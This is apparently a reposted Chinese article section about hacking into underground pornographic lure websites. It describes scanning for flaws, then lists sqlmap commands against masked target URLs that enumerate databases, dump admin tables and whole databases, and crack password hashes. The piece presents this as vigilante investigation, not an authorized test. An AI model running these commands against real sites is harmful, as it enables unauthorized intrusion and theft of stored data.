-
拼客学院陈鑫杰:揭秘地下色情诱导网站,上车吧!
关键字: 揭秘地下色情诱导网站4、漏洞挖掘
如果按照正常的灰产打击流程,最直接的方法就是采用“钓鱼执法”,例如直接微信或者支付宝支付,然后看看能否加到好友,继而直接揪出幕后运营者(如果对方用的小号,并且腾讯和阿里不介入,此方法估计走不通)。
所以,在这之前,我们先看看能否在技术上进行突破。例如,能否通过拿到后台数据库,找到后台管理页面,直接接管网站,或者通过数据库找到更加详细的管理员账号信息等等,甚至通过服务器提权拿到整个服务器权限;而实现这些的前提是:能否找到这套“色情CMS”的漏洞?
考虑到这类Web软件偏“地下流传”,不像知名的discuz论坛,有很多公开漏洞和渗透工具可以直接利用。所以,先用Web漏扫看看有没有能否找到常规漏洞。先对托管在国外的几个色情网站动手,发现都是PHP+MySQL架构,很多在Windows+IIS上面跑,而且幸运的是,大体都能爆出SQL注入和XSS跨站脚本漏洞,当然,这些漏洞能不能用,还得进一步验证。
(注明:上面提到的漏扫,Burp/AWVS/Appscan随意,更具体的使用这里省去)
5、SQL注入渗透
接下来,先手工找几个注入点看看,点击网站的分类列表,可以得到类似“php?id=x“的链接=>
这里收集了不同网站的一批注入点,然后我们拿神器SQLmap出来溜一圈。不同网站防护情况不同(例如安装了waf),注入的效果是不同的,不能一条指令走到黑,需要调整注入的参数,例如是否加长时间延迟、是否采用随机头部、是否加大注入级别。按照这个思路,大概需要用到这些指令:
① SQL注入得到数据库和管理员信息
root@kali:~# sqlmap.py -u http://txxxcom/list.php?id=1 --dbs --users
root@kali:~# sqlmap.py -u http://txxxcom/list.php?id=1 --dbs --users --dbms mysql
root@kali:~# sqlmap.py -u http://txxxcom/list.php?id=1 --dbs --users --time-sec 2 --dbms mysql --level=2 --risk=2 --random-agent
②根据注入得到的数据库,获取数据库里面的数据表
sqlmap.py -u http://txxxcom/list.php?id=1 --tables -D “aaaaaa“
sqlmap.py -u http://txxxcom/list.php?id=1 --tables -D “aaaaaa“ --random-agent
③获取管理员数据表或者暴力脱裤
sqlmap.py -u http://txxxcom/list.php?id=1 --dump -T “xxadminxx“ -D “aaaaaa“
sqlmap.py -u http://txxxcom/list.php?id=1 --dbms mysql --dump-all -D “aaaaaa“
(注入失败)
(注入成功,正在下载数据库和获取管理员账号密码)
(注入成功,进行管理员密码破解,这里哈希值没跑出来,需要借助在线MD5工具破解)
成功的并且dump数据库下来的部分网站截图:
- 原标题:[冇眼睇]揭秘地下色情诱导网站,上车吧! 本文仅代表作者个人观点。
- 责任编辑:李泠
-
神舟十八号载人飞船发射取得圆满成功 评论 112“准备好为同志们挺身而出了吗?”“YES!” 评论 482哥大挺巴抗议持续,美众议长称国民警卫队应适时出动 评论 420安理会表决:俄方否决,中方反击美方指责 评论 305最新闻 Hot
-
阿斯麦新CEO上任,“在华业务是首要工作”
-
“中企强势进军,韩企在自己主场感到危机”
-
安理会上,俄美代表互相质问对方“为什么?”
-
周受资回应:我们哪儿都不会去
-
美官员:最近几周,美国已向乌克兰秘密提供远程导弹
-
“6年增加两倍”,美军高官又炒:中国速度“惊人”
-
“这泼天的富贵暂时轮不上美国”
-
“价格战太激烈,大众在华目标就是保住份额”
-
朔尔茨称“普京没资格”,俄方反怼
-
“以色列是种族隔离国家!”纽约爆发抗议,数百犹太人被捕
-
“宁德时代被美国施压还赚了,韩企投资美国怎么反而要亏?”
-
俄国防部副部长涉严重贪腐被拘
-
NASA局长抹黑中国登月,连专业常识都不顾了
-
特朗普迎接:我喜欢这人
-
欧洲急着减排,却发现实现目标得依赖中国
-
“中国报价太香,加税50%都吓不跑美国买家”
-